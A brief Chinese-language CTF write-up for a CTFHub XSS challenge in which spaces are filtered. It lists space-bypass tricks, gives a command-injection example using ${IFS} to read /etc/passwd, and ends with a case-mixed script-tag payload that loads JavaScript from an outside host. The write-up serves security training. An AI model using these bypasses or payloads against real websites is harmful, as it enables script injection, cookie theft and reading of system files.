XSS4-过滤空格（ctfhub）

一.题目链接：

https://www.ctfhub.com/#/skilltree

二.基础知识  

2.1 空格的绕过方式有哪些

这用的是:/**/
也可以使用:`/`,`%20`等

对比：${IFS} --》 通常用于命令的拼接，查询数据库等，并不在这里适用
cat${IFS}/etc/passwd

三.开始解题

1.按照正常思路，输入恶意xss代码进行攻击，发现没用，于是进入源代码查看，原来是对空格进行了过滤，使得原来的攻击失效了


2.于是通过/**/对空格进行绕过

3.playload

<sCRiPt/**/sRC=//uj.ci/dgw></sCrIpT>